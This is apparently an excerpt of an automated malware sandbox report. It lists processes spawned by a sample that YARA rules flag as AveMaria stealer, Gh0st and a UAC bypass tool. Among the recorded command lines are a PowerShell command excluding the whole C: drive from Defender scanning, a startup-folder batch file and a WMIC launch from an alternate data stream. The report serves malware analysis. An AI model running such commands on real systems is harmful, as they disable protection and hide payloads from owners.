                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:4
                        Start time:12:33:14
                        Start date:22/05/2022
                        Path:C:\ProgramData\images.exe
                        Wow64 process (32bit):true
                        Commandline:C:\ProgramData\images.exe
                        Imagebase:0x400000
                        File size:222720 bytes
                        MD5 hash:DABC6F0C75C134E5310BA3526ADBA833
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 24%, ReversingLabs
                        Reputation:low

                        Target ID:6
                        Start time:12:33:22
                        Start date:22/05/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:powershell Add-MpPreference -ExclusionPath C:\
                        Imagebase:0x1c0000
                        File size:430592 bytes
                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        Target ID:7
                        Start time:12:33:24
                        Start date:22/05/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
                        Imagebase:0x7ff737520000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:8
                        Start time:12:33:25
                        Start date:22/05/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\cmd.exe
                        Imagebase:0xc20000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:9
                        Start time:12:33:25
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:10
                        Start time:12:33:25
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:12
                        Start time:12:33:26
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:13
                        Start time:12:33:26
                        Start date:22/05/2022
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic process call create '"C:\ProgramData:ApplicationData"'
                        Imagebase:0x7ff7431c0000
                        File size:521728 bytes
                        MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:22
                        Start time:12:33:44
                        Start date:22/05/2022
                        Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:30616 bytes
                        MD5 hash:0600DF60EF88FD10663EC84709E5E245
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:23
                        Start time:12:33:44
                        Start date:22/05/2022
                        Path:C:\Windows\System32\drivers\rdpdr.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:182784 bytes
                        MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language

                        Target ID:27
                        Start time:12:33:45
                        Start date:22/05/2022
                        Path:C:\Windows\System32\drivers\tsusbhub.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:126464 bytes
                        MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language

                        Target ID:30
                        Start time:12:34:06
                        Start date:22/05/2022
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff674600000
                        File size:488448 bytes
                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Target ID:41
                        Start time:12:35:04
                        Start date:22/05/2022
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff674600000
                        File size:488448 bytes
                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        No disassembly